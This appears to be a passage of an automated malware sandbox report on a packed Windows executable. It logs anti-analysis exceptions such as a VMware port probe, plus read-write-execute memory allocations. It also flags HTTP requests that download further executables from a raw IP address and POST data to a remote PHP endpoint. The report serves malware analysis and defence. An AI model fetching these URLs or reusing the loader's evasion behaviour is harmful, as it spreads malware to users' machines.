__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 51 e9 b0 d1 ff ff 33 34 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x209443 exception.instruction: in eax, dx exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2135107 exception.address: 0xa39443 registers.esp: 2883044 registers.edi: 7090345 registers.eax: 1447909480 registers.ebp: 3999068180 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 10701788 registers.ecx: 20	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x207ee7 exception.address: 0xa37ee7 exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc000001d exception.offset: 2129639 registers.esp: 2883044 registers.edi: 7090345 registers.eax: 1 registers.ebp: 3999068180 registers.edx: 22104 registers.ebx: 0 registers.esi: 10701788 registers.ecx: 20	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 ea 29 2d 12 01 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x20922d exception.instruction: in eax, dx exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2134573 exception.address: 0xa3922d registers.esp: 2883044 registers.edi: 7090345 registers.eax: 1447909480 registers.ebp: 3999068180 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 10701788 registers.ecx: 10	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 60 e9 0d 00 00 00 ec e4 15 f5 41 3a exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x20d40f exception.instruction: int 1 exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000005 exception.offset: 2151439 exception.address: 0xa3d40f registers.esp: 2883012 registers.edi: 0 registers.eax: 2883012 registers.ebp: 3999068180 registers.edx: 10736539 registers.ebx: 10737037 registers.esi: 1659840454 registers.ecx: 54099	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 50 53 68 8c b5 75 7f e9 d5 fc ff ff 5a 42 81 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x20e037 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2154551 exception.address: 0xa3e037 registers.esp: 2883048 registers.edi: 7090345 registers.eax: 26887 registers.ebp: 3999068180 registers.edx: 10737185 registers.ebx: 7267124 registers.esi: 10 registers.ecx: 10737844	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 83 ec 04 89 0c 24 c7 04 24 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x20da76 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2153078 exception.address: 0xa3da76 registers.esp: 2883052 registers.edi: 7090345 registers.eax: 6379 registers.ebp: 3999068180 registers.edx: 10737185 registers.ebx: 0 registers.esi: 10 registers.ecx: 10740935	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 53 e9 3d fa ff ff 8b 2c 24 e9 00 00 00 00 81 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x21cc64 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2215012 exception.address: 0xa4cc64 registers.esp: 2883048 registers.edi: 9044826 registers.eax: 31289 registers.ebp: 3999068180 registers.edx: 10798602 registers.ebx: 7267343 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 ed 05 00 00 ba fa bf ba 18 29 d7 e9 35 fc exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x21cb6c exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2214764 exception.address: 0xa4cb6c registers.esp: 2883052 registers.edi: 0 registers.eax: 607947093 registers.ebp: 3999068180 registers.edx: 10801679 registers.ebx: 7267343 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 2e fa ff ff 57 68 04 00 00 00 5f e9 0c 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2206de exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2229982 exception.address: 0xa506de registers.esp: 2883048 registers.edi: 0 registers.eax: 32814 registers.ebp: 3999068180 registers.edx: 10801679 registers.ebx: 21542168 registers.esi: 1979774748 registers.ecx: 10812588	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 68 3a 32 90 0d 89 3c 24 53 e9 00 00 00 00 57 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x220727 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2230055 exception.address: 0xa50727 registers.esp: 2883052 registers.edi: 0 registers.eax: 32814 registers.ebp: 3999068180 registers.edx: 10801679 registers.ebx: 21542168 registers.esi: 1979774748 registers.ecx: 10845402	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 78 ed bb 0f 81 24 24 9f 9b b2 26 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x21ff67 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2228071 exception.address: 0xa4ff67 registers.esp: 2883052 registers.edi: 0 registers.eax: 262633 registers.ebp: 3999068180 registers.edx: 10801679 registers.ebx: 21542168 registers.esi: 0 registers.ecx: 10815586	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 94 00 00 00 8b 3c 24 55 89 e5 81 c5 04 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x22575a exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2250586 exception.address: 0xa5575a registers.esp: 2883044 registers.edi: 10836162 registers.eax: 33164 registers.ebp: 3999068180 registers.edx: 84201 registers.ebx: 1200255915 registers.esi: 0 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 05 37 ea bd 7f e9 2a 02 00 00 89 3c 24 52 c7 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x229f8a exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2269066 exception.address: 0xa59f8a registers.esp: 2883040 registers.edi: 10836162 registers.eax: 10852073 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 798928358 registers.esi: 0 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 29 d2 68 83 a6 cf 6f 89 2c 24 c7 04 24 0c 86 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x229739 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2266937 exception.address: 0xa59739 registers.esp: 2883044 registers.edi: 10836162 registers.eax: 10880305 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 798928358 registers.esi: 0 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 46 fe ff ff 83 c7 04 87 3c 24 5c b8 25 3b exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x229f08 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2268936 exception.address: 0xa59f08 registers.esp: 2883044 registers.edi: 30185 registers.eax: 10880305 registers.ebp: 3999068180 registers.edx: 4294941948 registers.ebx: 798928358 registers.esi: 0 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 68 3a 69 6b 2c 89 34 24 89 e6 57 bf f4 92 ff exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x235360 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2315104 exception.address: 0xa65360 registers.esp: 2883044 registers.edi: 3889341803 registers.eax: 10925137 registers.ebp: 3999068180 registers.edx: 2130520308 registers.ebx: 4164719936 registers.esi: 693667754 registers.ecx: 2141454873	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 53 68 ca 42 f6 7b 8b 1c 24 50 89 e0 56 e9 50 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x234a72 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2312818 exception.address: 0xa64a72 registers.esp: 2883044 registers.edi: 116969 registers.eax: 10925137 registers.ebp: 3999068180 registers.edx: 2130520308 registers.ebx: 4294943136 registers.esi: 693667754 registers.ecx: 2141454873	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 57 bf 39 f0 51 7c c1 e7 05 e9 07 03 00 00 87 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x246aa0 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2386592 exception.address: 0xa76aa0 registers.esp: 2883012 registers.edi: 607422801 registers.eax: 26622 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 4294943368 registers.esi: 10997789 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 51 b9 b6 2e 37 7e 81 ec 04 00 00 00 89 3c 24 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x247b44 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2390852 exception.address: 0xa77b44 registers.esp: 2883008 registers.edi: 607422801 registers.eax: 26583 registers.ebp: 3999068180 registers.edx: 1088267370 registers.ebx: 1527152128 registers.esi: 10974301 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 55 89 3c 24 89 e7 81 c7 04 00 00 00 81 ef 04 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x247546 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2389318 exception.address: 0xa77546 registers.esp: 2883012 registers.edi: 1392536160 registers.eax: 26583 registers.ebp: 3999068180 registers.edx: 0 registers.ebx: 1527152128 registers.esi: 10977236 registers.ecx: 2515271680	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 29 c9 ff 34 11 ff 34 24 ff 34 24 ff 34 24 58 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x248c0a exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2395146 exception.address: 0xa78c0a registers.esp: 2883012 registers.edi: 1392536160 registers.eax: 28356 registers.ebp: 3999068180 registers.edx: 11007737 registers.ebx: 1527152128 registers.esi: 10977236 registers.ecx: 1279143281	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 66 01 00 00 81 cf cd 14 be 2f 50 e9 3d 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x248af7 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2394871 exception.address: 0xa78af7 registers.esp: 2883012 registers.edi: 1392536160 registers.eax: 3013445984 registers.ebp: 3999068180 registers.edx: 11007737 registers.ebx: 1527152128 registers.esi: 10977236 registers.ecx: 4294941656	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 2c 24 56 e9 c2 fc ff ff 29 e9 5d exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x24b450 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2405456 exception.address: 0xa7b450 registers.esp: 2883008 registers.edi: 10988967 registers.eax: 26641 registers.ebp: 3999068180 registers.edx: 27232 registers.ebx: 528401 registers.esi: 21964252 registers.ecx: 11014385	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 68 b3 c6 75 43 89 1c 24 52 55 e9 00 00 00 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x24b894 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2406548 exception.address: 0xa7b894 registers.esp: 2883012 registers.edi: 10992016 registers.eax: 26641 registers.ebp: 3999068180 registers.edx: 27232 registers.ebx: 0 registers.esi: 754097549 registers.ecx: 11014385	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 05 00 05 46 65 e9 3c 01 00 00 01 d0 5a 87 04 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x250fad exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2428845 exception.address: 0xa80fad registers.esp: 2883008 registers.edi: 4009445764 registers.eax: 11012265 registers.ebp: 3999068180 registers.edx: 0 registers.ebx: 524336 registers.esi: 765089565 registers.ecx: 11010489	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 51 c7 04 24 74 1d 1f 6c 53 bb 24 f6 71 13 31 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x250f3e exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2428734 exception.address: 0xa80f3e registers.esp: 2883012 registers.edi: 4294940348 registers.eax: 11041882 registers.ebp: 3999068180 registers.edx: 24811 registers.ebx: 524336 registers.esi: 765089565 registers.ecx: 11010489	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 c2 00 00 00 8b 34 24 81 c4 04 00 00 00 81 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x253c31 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2440241 exception.address: 0xa83c31 registers.esp: 2883008 registers.edi: 4294940348 registers.eax: 28816 registers.ebp: 3999068180 registers.edx: 596234575 registers.ebx: 1224282757 registers.esi: 765089565 registers.ecx: 11024398	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 bb b2 3a 77 77 e9 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x254082 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2441346 exception.address: 0xa84082 registers.esp: 2883012 registers.edi: 4294940348 registers.eax: 28816 registers.ebp: 3999068180 registers.edx: 596234575 registers.ebx: 1224282757 registers.esi: 765089565 registers.ecx: 11053214	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 68 56 03 7e 28 89 34 24 c7 04 24 7c 65 7b 3f exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x253ef9 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2440953 exception.address: 0xa83ef9 registers.esp: 2883012 registers.edi: 4294940348 registers.eax: 3939837675 registers.ebp: 3999068180 registers.edx: 0 registers.ebx: 1224282757 registers.esi: 765089565 registers.ecx: 11027922	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 38 06 00 00 81 c1 f1 60 f7 79 5a 53 e9 d7 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x255002 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2445314 exception.address: 0xa85002 registers.esp: 2883012 registers.edi: 11028718 registers.eax: 26656 registers.ebp: 3999068180 registers.edx: 1671186263 registers.ebx: 11055944 registers.esi: 11028424 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb b8 d7 b3 fe 3f 05 89 f4 fb 6f c1 e0 03 50 52 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2551e0 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2445792 exception.address: 0xa851e0 registers.esp: 2883012 registers.edi: 4294943980 registers.eax: 26656 registers.ebp: 3999068180 registers.edx: 1671186263 registers.ebx: 11055944 registers.esi: 2298801283 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 57 bf f3 c0 7b 5b 29 f9 5f e9 12 00 00 00 b8 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2611a5 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2494885 exception.address: 0xa911a5 registers.esp: 2883008 registers.edi: 4294943980 registers.eax: 30882 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 11034275 registers.ecx: 11077380	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 31 db e9 4f 03 00 00 52 89 e2 81 c2 04 00 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2609f2 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2492914 exception.address: 0xa909f2 registers.esp: 2883012 registers.edi: 4294943980 registers.eax: 30882 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 11034275 registers.ecx: 11108262	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 17 00 00 00 87 0c 24 5c e9 4d 04 00 00 58 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2607a5 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2492325 exception.address: 0xa907a5 registers.esp: 2883012 registers.edi: 3434365800 registers.eax: 30882 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 4294939344 registers.esi: 11034275 registers.ecx: 11108262	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 6d 00 00 00 5c 55 54 8b 2c 24 e9 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x26d662 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2545250 exception.address: 0xa9d662 registers.esp: 2883012 registers.edi: 0 registers.eax: 26184 registers.ebp: 3999068180 registers.edx: 10663910 registers.ebx: 11130686 registers.esi: 2298801283 registers.ecx: 3220975750	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 81 e9 66 5f f7 73 68 76 03 1b 23 89 3c 24 e9 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2785df exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2590175 exception.address: 0xaa85df registers.esp: 2883008 registers.edi: 11162386 registers.eax: 26123 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 1971716070 registers.esi: 2298801283 registers.ecx: 11173999	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 50 89 2c 24 81 ec 04 00 00 00 89 3c 24 e9 be exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2786cd exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2590413 exception.address: 0xaa86cd registers.esp: 2883012 registers.edi: 11162386 registers.eax: 4294944504 registers.ebp: 3999068180 registers.edx: 1777711698 registers.ebx: 1971716070 registers.esi: 2298801283 registers.ecx: 11200122	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 89 00 00 00 56 e9 ed fd ff ff 68 70 9a ac exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x279442 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2593858 exception.address: 0xaa9442 registers.esp: 2883008 registers.edi: 11162386 registers.eax: 28120 registers.ebp: 3999068180 registers.edx: 1601505386 registers.ebx: 11177710 registers.esi: 2298801283 registers.ecx: 1368775954	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 a4 02 00 00 8f 04 24 5c 57 54 5f 81 c7 04 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x279209 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2593289 exception.address: 0xaa9209 registers.esp: 2883012 registers.edi: 11162386 registers.eax: 28120 registers.ebp: 3999068180 registers.edx: 1601505386 registers.ebx: 11205830 registers.esi: 2298801283 registers.ecx: 1368775954	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 ea 3f 36 69 89 0c 24 b9 9c fa ec exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2798c8 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2595016 exception.address: 0xaa98c8 registers.esp: 2883012 registers.edi: 11162386 registers.eax: 28120 registers.ebp: 3999068180 registers.edx: 1601505386 registers.ebx: 11205830 registers.esi: 322689 registers.ecx: 4294941784	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/mine/random.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://176.113.115.6/Ni9kiput/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7033027882/ZqkKpwG.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/5163778194/zx4PJh6.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7684569444/advnrNo.exe

Performs some HTTP requests (5 events)

request	GET http://176.113.115.7/mine/random.exe
request	POST http://176.113.115.6/Ni9kiput/index.php
request	GET http://176.113.115.7/files/7033027882/ZqkKpwG.exe
request	GET http://176.113.115.7/files/5163778194/zx4PJh6.exe
request	GET http://176.113.115.7/files/7684569444/advnrNo.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://176.113.115.6/Ni9kiput/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 237 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73872000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ec0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
